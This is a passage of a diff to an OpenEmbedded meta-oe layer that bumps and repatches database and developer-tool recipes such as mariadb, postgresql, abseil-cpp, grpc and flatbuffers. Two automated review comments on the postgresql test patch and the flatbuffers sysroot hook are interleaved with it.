b/unittest/mysys/aes-t.c -index 34704e06..cbec2760 100644 ---- a/unittest/mysys/aes-t.c -+++ b/unittest/mysys/aes-t.c -@@ -21,27 +21,96 @@ - #include <string.h> - #include <ctype.h> - --#define DO_TEST(mode, nopad, slen, fill, dlen, hash) \ -- SKIP_BLOCK_IF(mode == 0xDEADBEAF, nopad ? 
4 : 5, #mode " not supported") \ -- { \ -- memset(src, fill, src_len= slen); \ -- ok(my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_ENCRYPT, \ -- src, src_len, dst, &dst_len, \ -- key, sizeof(key), iv, sizeof(iv)) == MY_AES_OK, \ -- "encrypt " #mode " %u %s", src_len, nopad ? "nopad" : "pad"); \ -- if (!nopad) \ -- ok (dst_len == my_aes_get_size(mode, src_len), "my_aes_get_size");\ -- my_md5(md5, (char*)dst, dst_len); \ -- ok(dst_len == dlen && memcmp(md5, hash, sizeof(md5)) == 0, "md5"); \ -- ok(my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_DECRYPT, \ -- dst, dst_len, ddst, &ddst_len, \ -- key, sizeof(key), iv, sizeof(iv)) == MY_AES_OK, \ -- "decrypt " #mode " %u", dst_len); \ -- ok(ddst_len == src_len && memcmp(src, ddst, src_len) == 0, "memcmp"); \ -+ -+/** Test streaming encryption, bytewise update.*/ -+static int aes_crypt_bytewise(enum my_aes_mode mode, int flags, const unsigned char *src, -+ unsigned int slen, unsigned char *dst, unsigned int *dlen, -+ const unsigned char *key, unsigned int klen, -+ const unsigned char *iv, unsigned int ivlen) -+{ -+ /* Allocate context on odd address on stack, in order to -+ catch misalignment errors.*/ -+ void *ctx= (char *)alloca(MY_AES_CTX_SIZE+1)+1; -+ -+ int res1, res2; -+ uint d1= 0, d2; -+ uint i; -+ -+ if ((res1= my_aes_crypt_init(ctx, mode, flags, key, klen, iv, ivlen))) -+ return res1; -+ for (i= 0; i < slen; i++) -+ { -+ uint tmp_d1=0; -+ res1= my_aes_crypt_update(ctx, src+i,1, dst, &tmp_d1); -+ if (res1) -+ return res1; -+ d1+= tmp_d1; -+ dst+= tmp_d1; -+ } -+ res2= my_aes_crypt_finish(ctx, dst, &d2); -+ *dlen= d1 + d2; -+ return res1 ? 
res1 : res2; -+} -+ -+ -+#ifndef HAVE_EncryptAes128Ctr -+const uint MY_AES_CTR=0xDEADBEAF; -+#endif -+#ifndef HAVE_EncryptAes128Gcm -+const uint MY_AES_GCM=0xDEADBEAF; -+#endif -+ -+#define MY_AES_UNSUPPORTED(x) (x == 0xDEADBEAF) -+ -+static void do_test(uint mode, const char *mode_str, int nopad, uint slen, -+ char fill, size_t dlen, const char *hash) -+{ -+ uchar key[16]= {1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6}; -+ uchar iv[16]= {2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7}; -+ uchar src[1000], dst[1100], dst2[1100], ddst[1000]; -+ uchar md5[MY_MD5_HASH_SIZE]; -+ uint src_len, dst_len, dst_len2, ddst_len; -+ int result; -+ -+ if (MY_AES_UNSUPPORTED(mode)) -+ { -+ skip(nopad?7:6, "%s not supported", mode_str); -+ return; -+ } -+ memset(src, fill, src_len= slen); -+ result= my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_ENCRYPT, src, src_len, -+ dst, &dst_len, key, sizeof(key), iv, sizeof(iv)); -+ ok(result == MY_AES_OK, "encrypt %s %u %s", mode_str, src_len, -+ nopad ? "nopad" : "pad"); -+ -+ if (nopad) -+ { -+ result= aes_crypt_bytewise(mode, nopad | ENCRYPTION_FLAG_ENCRYPT, src, -+ src_len, dst2, &dst_len2, key, sizeof(key), -+ iv, sizeof(iv)); -+ ok(result == MY_AES_OK, "encrypt bytewise %s %u", mode_str, src_len); -+ /* Compare with non-bytewise encryption result*/ -+ ok(dst_len == dst_len2 && memcmp(dst, dst2, dst_len) == 0, -+ "memcmp bytewise %s %u", mode_str, src_len); -+ } -+ else -+ { -+ int dst_len_real= my_aes_get_size(mode, src_len); -+ ok(dst_len_real= dst_len, "my_aes_get_size"); - } -+ my_md5(md5, (char *) dst, dst_len); -+ ok(dst_len == dlen, "md5 len"); -+ ok(memcmp(md5, hash, sizeof(md5)) == 0, "md5"); -+ result= my_aes_crypt(mode, nopad | ENCRYPTION_FLAG_DECRYPT, -+ dst, dst_len, ddst, &ddst_len, key, sizeof(key), iv, -+ sizeof(iv)); -+ -+ ok(result == MY_AES_OK, "decrypt %s %u", mode_str, dst_len); -+ ok(ddst_len == src_len && memcmp(src, ddst, src_len) == 0, "memcmp"); -+} - --#define DO_TEST_P(M,S,F,D,H) DO_TEST(M,0,S,F,D,H) 
--#define DO_TEST_N(M,S,F,D,H) DO_TEST(M,ENCRYPTION_FLAG_NOPAD,S,F,D,H) -+#define DO_TEST_P(M, S, F, D, H) do_test(M, #M, 0, S, F, D, H) -+#define DO_TEST_N(M, S, F, D, H) do_test(M, #M, ENCRYPTION_FLAG_NOPAD, S, F, D, H) - - /* useful macro for debugging */ - #define PRINT_MD5() \ -@@ -53,25 +122,15 @@ - printf("\"\n"); \ - } while(0); - --#ifndef HAVE_EncryptAes128Ctr --const uint MY_AES_CTR=0xDEADBEAF; --#endif --#ifndef HAVE_EncryptAes128Gcm --const uint MY_AES_GCM=0xDEADBEAF; --#endif - - int - main(int argc __attribute__((unused)),char *argv[]) - { -- uchar key[16]= {1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6}; -- uchar iv[16]= {2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7}; -- uchar src[1000], dst[1100], ddst[1000]; -- uchar md5[MY_MD5_HASH_SIZE]; -- uint src_len, dst_len, ddst_len; - - MY_INIT(argv[0]); - -- plan(87); -+ plan(122); -+ - DO_TEST_P(MY_AES_ECB, 200, '.', 208, "\xd8\x73\x8e\x3a\xbc\x66\x99\x13\x7f\x90\x23\x52\xee\x97\x6f\x9a"); - DO_TEST_P(MY_AES_ECB, 128, '?', 144, "\x19\x58\x33\x85\x4c\xaa\x7f\x06\xd1\xb2\xec\xd7\xb7\x6a\xa9\x5b"); - DO_TEST_P(MY_AES_CBC, 159, '%', 160, "\x4b\x03\x18\x3d\xf1\xa7\xcd\xa1\x46\xb3\xc6\x8a\x92\xc0\x0f\xc9"); --- -2.25.1 - diff --git a/meta-oe/recipes-dbs/mysql/mariadb_10.7.4.bb b/meta-oe/recipes-dbs/mysql/mariadb_10.7.8.bb index c800c4c56c..87faabfa27 100644 --- a/meta-oe/recipes-dbs/mysql/mariadb_10.7.4.bb +++ b/meta-oe/recipes-dbs/mysql/mariadb_10.7.8.bb @@ -1,9 +1,7 @@ require mariadb.inc -inherit qemu - -DEPENDS += "qemu-native bison-native boost libpcre2 curl ncurses \ - zlib libaio libedit libevent libxml2 gnutls fmt lzo" +DEPENDS += "mariadb-native bison-native boost libpcre2 curl ncurses \ + zlib libaio libedit libevent libxml2 gnutls fmt lzo zstd" PROVIDES += "mysql5 libmysqlclient" diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch b/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch index 90b7419495..46343674fc 100644 
--- a/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch @@ -1,16 +1,17 @@ -From 780fd27ea6f7f2c446c46a7a5e26d94106c67efd Mon Sep 17 00:00:00 2001 +From 0801befde991250b4502954fdec61bec8c33da3b Mon Sep 17 00:00:00 2001 From: "Richard W.M. Jones" <rjones@redhat.com> Date: Sun, 20 Nov 2016 15:04:52 +0000 Subject: [PATCH] Add support for RISC-V. The architecture is sufficiently similar to aarch64 that simply extending the existing aarch64 macro works. + --- src/include/storage/s_lock.h | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/src/include/storage/s_lock.h b/src/include/storage/s_lock.h -index dccbd29..ad60429 100644 +index 95049f0..e08c963 100644 --- a/src/include/storage/s_lock.h +++ b/src/include/storage/s_lock.h @@ -317,11 +317,12 @@ tas(volatile slock_t *lock) @@ -35,7 +36,4 @@ index dccbd29..ad60429 100644 +#endif /* __arm__ || __arm || __aarch64__ || __aarch64 || __riscv */ - /* --- -2.34.1 - + /* S/390 and S/390x Linux (32- and 64-bit zSeries) */ diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch b/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch index 02f4c9e513..eeffe6bcb1 100644 --- a/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-Improve-reproducibility.patch @@ -1,4 +1,4 @@ -From bbba8a5261a99e79c9cd4693ef56021014a9856b Mon Sep 17 00:00:00 2001 +From e167d58d6be1b1ee4d49571650444700ab97ed7c Mon Sep 17 00:00:00 2001 From: Changqing Li <changqing.li@windriver.com> Date: Mon, 28 Dec 2020 16:38:21 +0800 Subject: [PATCH] Improve reproducibility, @@ -18,6 +18,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> update patch for v13.1 Signed-off-by: Changqing Li <changqing.li@windriver.com> + --- src/common/Makefile | 3 --- 1 file changed, 3 deletions(-) 
@@ -36,6 +37,3 @@ index 880722f..7a9b9d4 100644 override CPPFLAGS += -DVAL_CFLAGS_SL="\"$(CFLAGS_SL)\"" override CPPFLAGS += -DVAL_LDFLAGS="\"$(STD_LDFLAGS)\"" override CPPFLAGS += -DVAL_LDFLAGS_EX="\"$(LDFLAGS_EX)\"" --- -2.34.1 - diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch b/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch index 52ca276da6..eff69140f7 100644 --- a/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-config_info.c-not-expose-build-info.patch @@ -1,4 +1,4 @@ -From b92eebe8b0760fee7bd55c6c22318620c2c07579 Mon Sep 17 00:00:00 2001 +From 805f03529c7fc33685979651562112bab524e5a5 Mon Sep 17 00:00:00 2001 From: Mingli Yu <mingli.yu@windriver.com> Date: Mon, 1 Aug 2022 15:44:38 +0800 Subject: [PATCH] config_info.c: not expose build info @@ -8,13 +8,14 @@ Don't collect the build information to fix the buildpaths issue. Upstream-Status: Inappropriate [oe specific] Signed-off-by: Mingli Yu <mingli.yu@windriver.com> + --- configure.ac | 2 +- - src/common/config_info.c | 68 ---------------------------------------- - 2 files changed, 1 insertion(+), 69 deletions(-) + src/common/config_info.c | 70 +--------------------------------------- + 2 files changed, 2 insertions(+), 70 deletions(-) diff --git a/configure.ac b/configure.ac -index 0eb595b..508487b 100644 +index 54a539e..c6edc0a 100644 --- a/configure.ac +++ b/configure.ac @@ -23,7 +23,7 @@ AC_COPYRIGHT([Copyright (c) 1996-2021, PostgreSQL Global Development Group]) @@ -27,10 +28,10 @@ index 0eb595b..508487b 100644 [PG_MAJORVERSION=`expr "$PACKAGE_VERSION" : '\([0-9][0-9]*\)'`] [PG_MINORVERSION=`expr "$PACKAGE_VERSION" : '.*\.\([0-9][0-9]*\)'`] diff --git a/src/common/config_info.c b/src/common/config_info.c -index e72e729..b482c20 100644 +index e72e729..a020236 100644 --- a/src/common/config_info.c 
+++ b/src/common/config_info.c -@@ -38,7 +38,7 @@ +@@ -38,7 +38,7 @@ get_configdata(const char *my_exec_path, size_t *configdata_len) int i = 0; /* Adjust this to match the number of items filled below */ @@ -39,7 +40,7 @@ index e72e729..b482c20 100644 configdata = (ConfigData *) palloc(*configdata_len * sizeof(ConfigData)); configdata[i].name = pstrdup("BINDIR"); -@@ -123,74 +123,6 @@ +@@ -123,74 +123,6 @@ get_configdata(const char *my_exec_path, size_t *configdata_len) configdata[i].setting = pstrdup(path); i++; @@ -114,6 +115,3 @@ index e72e729..b482c20 100644 configdata[i].name = pstrdup("VERSION"); configdata[i].setting = pstrdup("PostgreSQL " PG_VERSION); i++; --- -2.25.1 - diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch b/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch index 4a576d7172..807eac219b 100644 --- a/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch +++ b/meta-oe/recipes-dbs/postgresql/files/0001-configure.ac-bypass-autoconf-2.69-version-check.patch @@ -1,4 +1,4 @@ -From 258c6bd2ad96f2c42f1cb5f4c84e4ca5865059f0 Mon Sep 17 00:00:00 2001 +From c48f2f132744a0b4a2473ec178d63c1d4d1a4a86 Mon Sep 17 00:00:00 2001 From: Yi Fan Yu <yifan.yu@windriver.com> Date: Fri, 5 Feb 2021 17:15:42 -0500 Subject: [PATCH] configure.ac: bypass autoconf 2.69 version check @@ -14,12 +14,12 @@ Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com> 1 file changed, 4 deletions(-) diff --git a/configure.ac b/configure.ac -index ffe878e..c39799b 100644 +index e59dc99..41b4732 100644 --- a/configure.ac +++ b/configure.ac 
@@ -19,10 +19,6 @@ m4_pattern_forbid(^PGAC_)dnl to catch undefined macros - AC_INIT([PostgreSQL], [14.5], [pgsql-bugs@lists.postgresql.org], [], [https://www.postgresql.org/]) + AC_INIT([PostgreSQL], [14.11], [pgsql-bugs@lists.postgresql.org], [], [https://www.postgresql.org/]) -m4_if(m4_defn([m4_PACKAGE_VERSION]), [2.69], [], [m4_fatal([Autoconf version 2.69 is required. -Untested combinations of 'autoconf' and PostgreSQL versions are not diff --git a/meta-oe/recipes-dbs/postgresql/files/0001-postgresql-fix-ptest-failure-of-sysviews.patch b/meta-oe/recipes-dbs/postgresql/files/0001-postgresql-fix-ptest-failure-of-sysviews.patch new file mode 100644 index 0000000000..555fd7f1fc --- /dev/null +++ b/meta-oe/recipes-dbs/postgresql/files/0001-postgresql-fix-ptest-failure-of-sysviews.patch 
@@ -0,0 +1,47 @@ +From 5a17b7b88776cbbe5b37838baff71726b8a6e7dd Mon Sep 17 00:00:00 2001 +From: Manoj Saun <manojsingh.saun@windriver.com> +Date: Wed, 22 Mar 2023 08:07:26 +0000 +Subject: [PATCH] postgresql: fix ptest failure of sysviews + +The patch "0001-config_info.c-not-expose-build-info.patch" hides the debug info +in pg_config table which reduces the count of rows from pg_config and leads to +sysviews test failure. +To fix it we need to reduce the count of parameters in sysviews test. +Also we need to reduce the row count in expected result of sysview test +to make the test output shown as pass. + +Upstream-Status: Inappropriate [oe specific] + +Signed-off-by: Manoj Saun <manojsingh.saun@windriver.com> + +--- + src/test/regress/expected/sysviews.out | 2 +- + src/test/regress/sql/sysviews.sql | 2 +- + 2 files changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/test/regress/expected/sysviews.out b/src/test/regress/expected/sysviews.out +index 2088857..96a15cc 100644 +--- a/src/test/regress/expected/sysviews.out ++++ b/src/test/regress/expected/sysviews.out +@@ -29,7 +29,7 @@ select name, ident, parent, level, total_bytes >= free_bytes + (1 row) + + -- At introduction, pg_config had 23 entries; it may grow +-select count(*) > 20 as ok from pg_config; ++select count(*) > 13 as ok from pg_config; + ok + ---- + t +diff --git a/src/test/regress/sql/sysviews.sql b/src/test/regress/sql/sysviews.sql +index b24816e..72ff887 100644 +--- a/src/test/regress/sql/sysviews.sql ++++ b/src/test/regress/sql/sysviews.sql +@@ -18,7 +18,7 @@ select name, ident, parent, level, total_bytes >= free_bytes + from pg_backend_memory_contexts where level = 0; + + -- At introduction, pg_config had 23 entries; it may grow +-select count(*) > 20 as ok from pg_config; ++select count(*) > 13 as ok from pg_config; + + -- We expect no cursors in this test; see also portals.sql + select count(*) = 0 as ok from pg_cursors; 
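Review bot: The relaxed check `select count(*) > 13 as ok from pg_config;` is left under the unchanged comment `-- At introduction, pg_config had 23 entries; it may grow`, in both sql/sysviews.sql and expected/sysviews.out, so the patched test no longer explains why the bound is 13. The patch description ties the lower row count to 0001-config_info.c-not-expose-build-info.patch. A comment next to the changed query, such as `-- OE: build-info rows are dropped by 0001-config_info.c-not-expose-build-info.patch`, would keep the two patches linked when either is refreshed. A lower bound alone also cannot detect the build-info rows coming back, which is presumably what the config_info patch is meant to prevent.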
diff --git a/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch b/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch index fa46912eef..b742bd53bd 100644 --- a/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch +++ b/meta-oe/recipes-dbs/postgresql/files/not-check-libperl.patch @@ -1,4 +1,4 @@ -From 56b830edecff1cac5f8a8a956e7a7eeef2aa7c17 Mon Sep 17 00:00:00 2001 +From 09fad1883f3312965a8d066f8477166eaa4db2c7 Mon Sep 17 00:00:00 2001 From: Changqing Li <changqing.li@windriver.com> Date: Tue, 27 Nov 2018 13:25:15 +0800 Subject: [PATCH] not check libperl under cross compiling @@ -15,15 +15,16 @@ Signed-off-by: Roy Li <rongqing.li@windriver.com> update patch to version 11.1 Signed-off-by: Changqing Li <changqing.li@windriver.com> + --- configure.ac | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac -index fba79ee..7170f26 100644 +index 159f2a2..d0f0b14 100644 --- a/configure.ac +++ b/configure.ac -@@ -2261,7 +2261,7 @@ Use --without-tcl to disable building PL/Tcl.]) +@@ -2332,7 +2332,7 @@ Use --without-tcl to disable building PL/Tcl.]) fi # check for <perl.h> @@ -32,6 +33,3 @@ index fba79ee..7170f26 100644 ac_save_CPPFLAGS=$CPPFLAGS CPPFLAGS="$CPPFLAGS $perl_includespec" AC_CHECK_HEADER(perl.h, [], [AC_MSG_ERROR([header file <perl.h> is required for Perl])], --- -2.34.1 - diff --git a/meta-oe/recipes-dbs/postgresql/files/remove_duplicate.patch b/meta-oe/recipes-dbs/postgresql/files/remove_duplicate.patch deleted file mode 100644 index 92a3dcc710..0000000000 --- a/meta-oe/recipes-dbs/postgresql/files/remove_duplicate.patch +++ /dev/null 
@@ -1,38 +0,0 @@ -Remove duplicate code for riscv - -Upstream-Status: Pending -Signed-off-by: Khem Raj <raj.khem@gmail.com> - ---- a/src/include/storage/s_lock.h -+++ b/src/include/storage/s_lock.h -@@ -341,30 +341,6 @@ tas(volatile slock_t *lock) - #endif /* HAVE_GCC__SYNC_INT32_TAS */ - #endif /* __arm__ || __arm || __aarch64__ || __aarch64 || __riscv */ - -- --/* -- * RISC-V likewise uses __sync_lock_test_and_set(int *, int) if available. -- */ --#if defined(__riscv) --#ifdef HAVE_GCC__SYNC_INT32_TAS --#define HAS_TEST_AND_SET -- --#define TAS(lock) tas(lock) -- --typedef int slock_t; -- --static __inline__ int --tas(volatile slock_t *lock) --{ -- return __sync_lock_test_and_set(lock, 1); --} -- --#define S_UNLOCK(lock) __sync_lock_release(lock) -- --#endif /* HAVE_GCC__SYNC_INT32_TAS */ --#endif /* __riscv */ -- -- - /* S/390 and S/390x Linux (32- and 64-bit zSeries) */ - #if defined(__s390__) || defined(__s390x__) - #define HAS_TEST_AND_SET diff --git a/meta-oe/recipes-dbs/postgresql/postgresql_14.5.bb b/meta-oe/recipes-dbs/postgresql/postgresql_14.11.bb index 1551d34053..8a8c3b9f1e 100644 --- a/meta-oe/recipes-dbs/postgresql/postgresql_14.5.bb +++ b/meta-oe/recipes-dbs/postgresql/postgresql_14.11.bb @@ -1,17 +1,17 @@ require postgresql.inc -LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=75af6e3eeec4a06cdd2e578673236fc3" +LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89afbb2d7716371015101c2b2cb4297a" SRC_URI += "\ file://not-check-libperl.patch \ file://0001-Add-support-for-RISC-V.patch \ file://0001-Improve-reproducibility.patch \ file://0001-configure.ac-bypass-autoconf-2.69-version-check.patch \ - file://remove_duplicate.patch \ file://0001-config_info.c-not-expose-build-info.patch \ + file://0001-postgresql-fix-ptest-failure-of-sysviews.patch \ " -SRC_URI[sha256sum] = "d4f72cb5fb857c9a9f75ec8cf091a1771272802f2178f0b2e65b7b6ff64f4a30" +SRC_URI[sha256sum] = "a670bd7dce22dcad4297b261136b3b1d4a09a6f541719562aa14ca63bf2968a8" CVE_CHECK_IGNORE += "\ CVE-2017-8806 \ 
diff --git a/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp/0001-absl-strings-internal-str_format-extension.h-add-mis.patch b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp/0001-absl-strings-internal-str_format-extension.h-add-mis.patch new file mode 100644 index 0000000000..88f3816b0f --- /dev/null +++ b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp/0001-absl-strings-internal-str_format-extension.h-add-mis.patch @@ -0,0 +1,31 @@ +From b436bc4ef31e29d73363d60b84e77eb419f46c50 Mon Sep 17 00:00:00 2001 +From: Sergei Trofimovich <slyich@gmail.com> +Date: Fri, 27 May 2022 22:27:58 +0100 +Subject: [PATCH] absl/strings/internal/str_format/extension.h: add missing + <stdint.h> include + +Without the change absl-cpp build fails on this week's gcc-13 snapshot as: + + /build/abseil-cpp/absl/strings/internal/str_format/extension.h:34:33: error: found ':' in nested-name-specifier, expected '::' + 34 | enum class FormatConversionChar : uint8_t; + | ^ + | :: + +Upstream-Status: Backport [20220623.0 36a4b073f1e7e02ed7d1ac140767e36f82f09b7c] +Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com> +--- + absl/strings/internal/str_format/extension.h | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/absl/strings/internal/str_format/extension.h b/absl/strings/internal/str_format/extension.h +index c47536d6..08c3fbeb 100644 +--- a/absl/strings/internal/str_format/extension.h ++++ b/absl/strings/internal/str_format/extension.h +@@ -17,6 +17,7 @@ + #define ABSL_STRINGS_INTERNAL_STR_FORMAT_EXTENSION_H_ + + #include <limits.h> ++#include <stdint.h> + + #include <cstddef> + #include <cstring> diff --git a/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb index 1bb27d4369..30eef75ffb 100644 --- a/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb +++ b/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb 
@@ -14,6 +14,7 @@ SRC_URI = "git://github.com/abseil/abseil-cpp;branch=${BRANCH};protocol=https \ file://0001-absl-always-use-asm-sgidefs.h.patch \ file://0002-Remove-maes-option-from-cross-compilation.patch \ file://abseil-ppc-fixes.patch \ + file://0001-absl-strings-internal-str_format-extension.h-add-mis.patch \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/capnproto/capnproto_0.9.1.bb b/meta-oe/recipes-devtools/capnproto/capnproto_0.9.2.bb index d14bd843ef..d114ad0c63 100644 --- a/meta-oe/recipes-devtools/capnproto/capnproto_0.9.1.bb +++ b/meta-oe/recipes-devtools/capnproto/capnproto_0.9.2.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://../LICENSE;md5=a05663ae6cca874123bf667a60dca8c9" SRC_URI = "git://github.com/sandstorm-io/capnproto.git;branch=release-${PV};protocol=https \ " -SRCREV = "b49431c48d40490ef979247d308af63345376cee" +SRCREV = "0274bf17374df912ea834687c667bed33bd318db" S = "${WORKDIR}/git/c++" diff --git a/meta-oe/recipes-devtools/cjson/cjson_1.7.15.bb b/meta-oe/recipes-devtools/cjson/cjson_1.7.17.bb index 200f751669..c9c38a9fe3 100644 --- a/meta-oe/recipes-devtools/cjson/cjson_1.7.15.bb +++ b/meta-oe/recipes-devtools/cjson/cjson_1.7.17.bb @@ -6,7 +6,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=218947f77e8cb8e2fa02918dc41c50d0" SRC_URI = "git://github.com/DaveGamble/cJSON.git;branch=master;protocol=https" -SRCREV = "d348621ca93571343a56862df7de4ff3bc9b5667" +SRCREV = "87d8f0961a01bf09bef98ff89bae9fdec42181ee" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/exprtk/exprtk_git.bb b/meta-oe/recipes-devtools/exprtk/exprtk_git.bb index 52975c8215..4019f26899 100644 --- a/meta-oe/recipes-devtools/exprtk/exprtk_git.bb +++ b/meta-oe/recipes-devtools/exprtk/exprtk_git.bb 
@@ -3,9 +3,9 @@ HOMEPAGE = "https://github.com/ArashPartow/exprtk" SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRCREV = "281c2ccc65b8f91c012ea3725ebcef406378a225" +SRCREV = "f46bffcd6966d38a09023fb37ba9335214c9b959" -SRC_URI = "git://github.com/ArashPartow/exprtk.git;branch=master;protocol=https" +SRC_URI = "git://github.com/ArashPartow/exprtk.git;branch=release;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb b/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb index bf74f1229f..44478ea0b2 100644 --- a/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb +++ b/meta-oe/recipes-devtools/flatbuffers/flatbuffers_2.0.0.bb @@ -25,12 +25,17 @@ BUILD_CXXFLAGS += "-fPIC" # BUILD_TYPE=Release is required, otherwise flatc is not installed EXTRA_OECMAKE += "\ -DCMAKE_BUILD_TYPE=Release \ - -DFLATBUFFERS_BUILD_TESTS=OFF \ + -DFLATBUFFERS_BUILD_TESTS=OFF \ -DFLATBUFFERS_BUILD_SHAREDLIB=ON \ " inherit cmake +rm_flatc_cmaketarget_for_target() { + rm -f "${SYSROOT_DESTDIR}/${libdir}/cmake/flatbuffers/FlatcTargets.cmake" +} +SYSROOT_PREPROCESS_FUNCS:class-target += "rm_flatc_cmaketarget_for_target" + do_install:append() { install -d ${D}${PYTHON_SITEPACKAGES_DIR} cp -rf ${S}/python/flatbuffers ${D}${PYTHON_SITEPACKAGES_DIR} diff --git a/meta-oe/recipes-devtools/grpc/grpc_1.45.2.bb b/meta-oe/recipes-devtools/grpc/grpc_1.46.7.bb index c2f952fc64..ab6f6e46cd 100644 --- a/meta-oe/recipes-devtools/grpc/grpc_1.45.2.bb +++ b/meta-oe/recipes-devtools/grpc/grpc_1.46.7.bb 
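Review bot: In the flatbuffers hunk, `SYSROOT_PREPROCESS_FUNCS:class-target += "rm_flatc_cmaketarget_for_target"` appends to the override-qualified variable. When `class-target` is active that variable replaces the base `SYSROOT_PREPROCESS_FUNCS` instead of extending it. Any function registered by an inherited class or include would then be dropped for target builds; whether one exists is not visible from this hunk. `SYSROOT_PREPROCESS_FUNCS:append:class-target = " rm_flatc_cmaketarget_for_target"` keeps the existing list. A one-line comment above `rm_flatc_cmaketarget_for_target()` saying why `FlatcTargets.cmake` must not reach the target sysroot would also help.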
@@ -20,8 +20,8 @@ RDEPENDS:${PN}-dev:append:class-native = " ${PN}-compiler" # RDEPENDS:${PN}-dev += "${PN}-compiler" S = "${WORKDIR}/git" -SRCREV_grpc = "b39ffcc425ea990a537f98ec6fe6a1dcb90470d7" -BRANCH = "v1.45.x" +SRCREV_grpc = "02384e39185f109bd299eb8482306229967dc970" +BRANCH = "v1.46.x" SRC_URI = "git://github.com/grpc/grpc.git;protocol=https;name=grpc;branch=${BRANCH} \ file://0001-Revert-Changed-GRPCPP_ABSEIL_SYNC-to-GPR_ABSEIL_SYNC.patch \ file://0001-cmake-add-separate-export-for-plugin-targets.patch \ @@ -66,3 +66,6 @@ FILES:${PN}-compiler += " \ ${bindir} \ ${libdir}/libgrpc_plugin_support${SOLIBS} \ " + +# this CVE was introduced in v1.53.0 and not backported to v1.46.x branch +CVE_CHECK_IGNORE += "CVE-2023-32732" diff --git a/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb b/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb index 29937e26d0..be2c0f5394 100644 --- a/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb +++ b/meta-oe/recipes-devtools/heaptrack/heaptrack_1.2.0.bb @@ -29,4 +29,4 @@ EXTRA_OECMAKE += "-DHEAPTRACK_BUILD_GUI=OFF" COMPATIBLE_HOST:riscv32 = "null" COMPATIBLE_HOST:riscv64 = "null" -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb b/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb index c82761ac34..87d51d8a4d 100644 --- a/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb +++ b/meta-oe/recipes-devtools/lapack/lapack_3.10.0.bb @@ -17,6 +17,9 @@ SRCREV = "aa631b4b4bd13f6ae2dbab9ae9da209e1e05b0fc" SRC_URI = "git://github.com/Reference-LAPACK/lapack.git;protocol=https;branch=master" S = "${WORKDIR}/git" +PACKAGECONFIG ?= "" +PACKAGECONFIG[lapacke] = "-DLAPACKE=ON,-DLAPACKE=OFF" + EXTRA_OECMAKE = " -DBUILD_SHARED_LIBS=ON " OECMAKE_GENERATOR = "Unix Makefiles" diff --git a/meta-oe/recipes-devtools/nlohmann-json/files/run-ptest b/meta-oe/recipes-devtools/nlohmann-json/files/run-ptest new file mode 100755 index 0000000000..2f00267d50 --- /dev/null 
